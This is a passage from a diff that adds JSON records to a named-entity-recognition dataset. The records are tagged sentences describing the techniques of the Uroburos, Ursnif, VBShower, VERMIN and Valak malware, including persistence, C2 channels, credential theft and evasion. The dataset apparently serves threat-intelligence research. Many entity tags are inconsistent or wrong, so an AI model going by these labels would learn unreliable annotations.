"Uroburos-related", + "logs." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Uroburos", + "can", + "search", + "for", + "specific", + "files", + "on", + "a", + "compromised", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Uroburos", + "can", + "store", + "configuration", + "information", + "for", + "the", + "kernel", + "driver", + "and", + "kernel", + "driver", + "loader", + "components", + "in", + "an", + "encrypted", + "blob", + "typically", + "found", + "at", + "`HKLM:\\SOFTWARE\\Classes\\.wav\\OpenWithProgIds.`" + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Uroburos", + "can", + "use", + "concealed", + "storage", + "mechanisms", + "including", + "an", + "NTFS", + "or", + "FAT-16", + "filesystem", + "encrypted", + "with", + "CAST-128", + "in", + "CBC", + "mode." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Uroburos", + "can", + "use", + "a", + "`Put`", + "command", + "to", + "write", + "files", + "to", + "an", + "infected", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Uroburos", + "has", + "the", + "ability", + "to", + "move", + "data", + "between", + "its", + "kernel", + "and", + "user", + "mode", + "components,", + "generally", + "using", + "named", + "pipes." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Uroburos", + "can", + "add", + "extra", + "characters", + "in", + "encoded", + "strings", + "to", + "help", + "mimic", + "DNS", + "legitimate", + "requests." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Uroburos", + "can", + "use", + "custom", + "communications", + "protocols", + "that", + "ride", + "over", + "SMTP." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Uroburos", + "has", + "registered", + "a", + "service", + "named", + "`WerFaultSvc`,", + "likely", + "to", + "spoof", + "the", + "legitimate", + "Windows", + "error", + "reporting", + "service." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Uroburos", + "can", + "store", + "configuration", + "information", + "in", + "the", + "Registry", + "including", + "the", + "initialization", + "vector", + "and", + "AES", + "key", + "needed", + "to", + "find", + "and", + "decrypt", + "other", + "Uroburos", + "components." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "Individual", + "Uroburos", + "implants", + "can", + "use", + "multiple", + "communication", + "channels", + "based", + "on", + "one", + "of", + "four", + "available", + "modes", + "of", + "operation." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "B-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Uroburos", + "can", + "use", + "implants", + "on", + "multiple", + "compromised", + "machines", + "to", + "proxy", + "communications", + "through", + "its", + "worldwide", + "P2P", + "network." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Uroburos", + "can", + "use", + "native", + "Windows", + "APIs", + "including", + "`GetHostByName`." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Uroburos", + "can", + "communicate", + "through", + "custom", + "methodologies", + "for", + "UDP,", + "ICMP,", + "and", + "TCP", + "that", + "use", + "distinct", + "sessions", + "to", + "ride", + "over", + "the", + "legitimate", + "protocols." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Uroburos", + "can", + "use", + "a", + "custom", + "base62", + "and", + "a", + "de-facto", + "base32", + "encoding", + "that", + "uses", + "digits", + "0-9", + "and", + "lowercase", + "letters", + "a-z", + "in", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Tool", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Uroburos", + "can", + "use", + "its", + "`Process", + "List`", + "command", + "to", + "enumerate", + "processes", + "on", + "compromised", + "hosts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Uroburos", + "can", + "use", + "custom", + "communication", + "methodologies", + "that", + "ride", + "over", + "common", + "protocols", + "including", + "TCP,", + "UDP,", + "HTTP,", + "SMTP,", + "and", + "DNS", + "in", + "order", + "to", + "blend", + "with", + "normal", + "network", + "traffic." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "B-Way", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "Uroburos", + "has", + "the", + "ability", + "to", + "communicate", + "over", + "custom", + "communications", + "methodologies", + "that", + "ride", + "over", + "common", + "network", + "protocols", + "including", + "raw", + "TCP", + "and", + "UDP", + "sockets,", + "HTTP,", + "SMTP,", + "and", + "DNS." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "B-Way", + "B-Tool", + "B-Way", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Uroburos", + "can", + "query", + "the", + "Registry,", + "typically", + "`HKLM:\\SOFTWARE\\Classes\\.wav\\OpenWithProgIds`,", + "to", + "find", + "the", + "key", + "and", + "path", + "to", + "decrypt", + "and", + "load", + "its", + "kernel", + "driver", + "and", + "kernel", + "driver", + "loader." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Uroburos", + "has", + "the", + "ability", + "to", + "load", + "new", + "modules", + "directly", + "into", + "memory", + "using", + "its", + "`Load", + "Modules", + "Mem`", + "command." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "B-Way", + "I-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "Uroburos", + "can", + "use", + "its", + "kernel", + "module", + "to", + "prevent", + "its", + "host", + "components", + "from", + "being", + "listed", + "by", + "the", + "targeted", + "system's", + "OS", + "and", + "to", + "mediate", + "requests", + "between", + "user", + "mode", + "and", + "concealed", + "components." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Uroburos", + "uses", + "a", + "custom", + "packer." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "Uroburos", + "can", + "encrypt", + "the", + "data", + "beneath", + "its", + "http2", + "or", + "tcp", + "encryption", + "at", + "the", + "session", + "layer", + "with", + "CAST-128,", + "using", + "a", + "different", + "key", + "for", + "incoming", + "and", + "outgoing", + "data." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Uroburos", + "has", + "the", + "ability", + "to", + "gather", + "basic", + "system", + "information", + "and", + "run", + "the", + "POSIX", + "API", + "`gethostbyname`." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O" + ] + }, + { + "tokens": [ + "Uroburos", + "can", + "intercept", + "the", + "first", + "client", + "to", + "server", + "packet", + "in", + "the", + "3-way", + "TCP", + "handshake", + "to", + "determine", + "if", + "the", + "packet", + "contains", + "the", + "correct", + "unique", + "value", + "for", + "a", + "specific", + "Uroburos", + "implant.", + "If", + "the", + "value", + "does", + "not", + "match,", + "the", + "packet", + "and", + "the", + "rest", + "of", + "the", + "TCP", + "session", + "are", + "passed", + "to", + "the", + "legitimate", + "listening", + "application." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Uroburos", + "can", + "use", + "a", + "custom", + "HTTP-based", + "protocol", + "for", + "large", + "data", + "communications", + "that", + "can", + "blend", + "with", + "normal", + "network", + "traffic", + "by", + "riding", + "on", + "top", + "of", + "standard", + "HTTP." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "I-Tool", + "B-Way", + "B-Tool", + "O", + "O", + "I-Idus", + "I-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Uroburos", + "has", + "the", + "ability", + "to", + "use", + "the", + "command", + "line", + "for", + "execution", + "on", + "the", + "targeted", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Uroburos", + "has", + "registered", + "a", + "service,", + "typically", + "named", + "`WerFaultSvc`,", + "to", + "decrypt", + "and", + "find", + "a", + "kernel", + "driver", + "and", + "kernel", + "driver", + "loader", + "to", + "maintain", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Purp" + ] + }, + { + "tokens": [ + "Ursnif", + "has", + "injected", + "HTML", + "codes", + "into", + "banking", + "sites", + "to", + "steal", + "sensitive", + "online", + "banking", + "information", + "(ex:", + "usernames", + "and", + "passwords)." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Way", + "B-Way", + "B-Way", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ursnif", + "droppers", + "execute", + "base64", + "encoded", + "PowerShell", + "commands." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ursnif", + "droppers", + "have", + "used", + "COM", + "objects", + "to", + "execute", + "the", + "malware's", + "full", + "executable", + "payload." + ], + "ner_tags": [ + "B-Idus", + "B-SecTeam", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ursnif", + "has", + "hooked", + "APIs", + "to", + "perform", + "a", + "wide", + "variety", + "of", + "information", + "theft,", + "such", + "as", + "monitoring", + "traffic", + "from", + "browsers." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O" + ] + }, + { + "tokens": [ + "Ursnif", + "has", + "used", + "encoded", + "data", + "in", + "HTTP", + "URLs", + "for", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ursnif", + "has", + "collected", + "files", + "from", + "victim", + "machines,", + "including", + "certificates", + "and", + "cookies." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ursnif", + "has", + "used", + "crypto", + "key", + "information", + "stored", + "in", + "the", + "Registry", + "to", + "decrypt", + "Tor", + "clients", + "dropped", + "to", + "disk." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ursnif", + "has", + "used", + "a", + "DGA", + "to", + "generate", + "domain", + "names", + "for", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ursnif", + "has", + "used", + "an", + "XOR-based", + "algorithm", + "to", + "encrypt", + "Tor", + "clients", + "dropped", + "to", + "disk.", + "Ursnif", + "droppers", + "have", + "also", + "been", + "delivered", + "as", + "password-protected", + "zip", + "files", + "that", + "execute", + "base64", + "encoded", + "PowerShell", + "commands." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ursnif", + "has", + "used", + "HTTP", + "POSTs", + "to", + "exfil", + "gathered", + "information." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ursnif", + "has", + "deleted", + "data", + "staged", + "in", + "tmp", + "files", + "after", + "exfiltration." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ursnif", + "droppers", + "have", + "used", + "COM", + "properties", + "to", + "execute", + "malware", + "in", + "hidden", + "windows." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ursnif", + "has", + "dropped", + "payload", + "and", + "configuration", + "files", + "to", + "disk.", + "Ursnif", + "has", + "also", + "been", + "used", + "to", + "download", + "and", + "execute", + "additional", + "payloads." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "Ursnif", + "has", + "used", + "tmp", + "files", + "to", + "stage", + "gathered", + "information." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "Ursnif", + "has", + "used", + "strings", + "from", + "legitimate", + "system", + "files", + "and", + "existing", + "folders", + "for", + "its", + "file,", + "folder,", + "and", + "Registry", + "entry", + "names." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ursnif", + "has", + "used", + "Registry", + "modifications", + "as", + "part", + "of", + "its", + "installation", + "routine." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ursnif", + "has", + "used", + "Tor", + "for", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "Ursnif", + "has", + "used", + "<code>CreateProcessW</code>", + "to", + "create", + "child", + "processes." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ursnif", + "droppers", + "have", + "used", + "PowerShell", + "in", + "download", + "cradles", + "to", + "download", + "and", + "execute", + "the", + "malware's", + "full", + "executable", + "payload." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ursnif", + "has", + "gathered", + "information", + "about", + "running", + "processes." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ursnif", + "has", + "used", + "process", + "hollowing", + "to", + "inject", + "into", + "child", + "processes." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ursnif", + "has", + "used", + "a", + "peer-to-peer", + "(P2P)", + "network", + "for", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ursnif", + "has", + "used", + "Reg", + "to", + "query", + "the", + "Registry", + "for", + "installed", + "programs." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ursnif", + "has", + "used", + "Registry", + "Run", + "keys", + "to", + "establish", + "automatic", + "execution", + "at", + "system", + "startup." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ursnif", + "has", + "copied", + "itself", + "to", + "and", + "infected", + "removable", + "drives", + "for", + "propagation." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ursnif", + "has", + "used", + "hooked", + "APIs", + "to", + "take", + "screenshots." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ursnif", + "has", + "used", + "Systeminfo", + "to", + "gather", + "system", + "information." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Ursnif", + "has", + "gathered", + "information", + "about", + "running", + "services." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Idus" + ] + }, + { + "tokens": [ + "Ursnif", + "has", + "copied", + "itself", + "to", + "and", + "infected", + "files", + "in", + "network", + "drives", + "for", + "propagation." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "Ursnif", + "has", + "injected", + "code", + "into", + "target", + "processes", + "via", + "thread", + "local", + "storage", + "callbacks." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ursnif", + "has", + "used", + "a", + "30", + "minute", + "delay", + "after", + "execution", + "to", + "evade", + "sandbox", + "monitoring", + "tools." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ursnif", + "droppers", + "have", + "used", + "VBA", + "macros", + "to", + "download", + "and", + "execute", + "the", + "malware's", + "full", + "executable", + "payload." + ], + "ner_tags": [ + "B-Idus", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ursnif", + "has", + "used", + "HTTPS", + "for", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Ursnif", + "droppers", + "have", + "used", + "WMI", + "classes", + "to", + "execute", + "PowerShell", + "commands." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ursnif", + "has", + "registered", + "itself", + "as", + "a", + "system", + "service", + "in", + "the", + "Registry", + "for", + "automatic", + "execution", + "at", + "system", + "startup." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "VBShower", + "has", + "attempted", + "to", + "complicate", + "forensic", + "analysis", + "by", + "deleting", + "all", + "the", + "files", + "contained", + "in", + "<code>%APPDATA%\\..\\Local\\Temporary", + "Internet", + "Files\\Content.Word</code>", + "and", + "<code>%APPDATA%\\..\\Local", + "Settings\\Temporary", + "Internet", + "Files\\Content.Word\\</code>." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "VBShower", + "has", + "the", + "ability", + "to", + "download", + "VBS", + "files", + "to", + "the", + "target", + "computer." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "VBShower", + "used", + "<code>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\\\[a-f0-9A-F]{8}</code>", + "to", + "maintain", + "persistence." + ], + "ner_tags": [ + "B-Way", + "O", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "VBShower", + "has", + "the", + "ability", + "to", + "execute", + "VBScript", + "files." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "B-Features" + ] + }, + { + "tokens": [ + "VBShower", + "has", + "attempted", + "to", + "obtain", + "a", + "VBS", + "script", + "from", + "command", + "and", + "control", + "(C2)", + "nodes", + "over", + "HTTP." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "VERMIN", + "encrypts", + "the", + "collected", + "files", + "using", + "3-DES." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "VERMIN", + "can", + "perform", + "audio", + "capture." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "VERMIN", + "saves", + "each", + "collected", + "file", + "with", + "the", + "automatically", + "generated", + "format", + "{0:dd-MM-yyyy}.txt", + "." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "VERMIN", + "collects", + "data", + "stored", + "in", + "the", + "clipboard." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "VERMIN", + "decrypts", + "code,", + "strings,", + "and", + "commands", + "to", + "use", + "once", + "it's", + "on", + "the", + "victim's", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "VERMIN", + "is", + "obfuscated", + "using", + "the", + "obfuscation", + "tool", + "called", + "ConfuserEx." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "VERMIN", + "can", + "delete", + "files", + "on", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "VERMIN", + "can", + "download", + "and", + "upload", + "files", + "to", + "the", + "victim's", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "VERMIN", + "collects", + "keystrokes", + "from", + "the", + "victim", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "VERMIN", + "can", + "get", + "a", + "list", + "of", + "the", + "processes", + "and", + "running", + "tasks", + "on", + "the", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "VERMIN", + "can", + "perform", + "screen", + "captures", + "of", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "VERMIN", + "uses", + "WMI", + "to", + "check", + "for", + "anti-virus", + "software", + "installed", + "on", + "the", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "VERMIN", + "is", + "initially", + "packed." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "VERMIN", + "collects", + "the", + "OS", + "name,", + "machine", + "name,", + "and", + "architecture", + "information." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "VERMIN", + "gathers", + "the", + "local", + "IP", + "address." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "VERMIN", + "gathers", + "the", + "username", + "from", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "VERMIN", + "uses", + "HTTP", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Valak", + "can", + "download", + "a", + "module", + "to", + "search", + "for", + "and", + "build", + "a", + "report", + "of", + "harvested", + "credential", + "data." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Valak", + "can", + "use", + "the", + "clientgrabber", + "module", + "to", + "steal", + "e-mail", + "credentials", + "from", + "the", + "Registry." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Valak", + "has", + "the", + "ability", + "to", + "decode", + "and", + "decrypt", + "downloaded", + "files." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "B-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Valak", + "has", + "the", + "ability", + "to", + "enumerate", + "domain", + "admin", + "accounts." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Valak", + "can", + "execute", + "tasks", + "via", + "OLE." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Valak", + "has", + "the", + "ability", + "to", + "exfiltrate", + "data", + "over", + "the", + "C2", + "channel." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Valak", + "can", + "communicate", + "over", + "multiple", + "C2", + "hosts." + ], + "ner_tags": 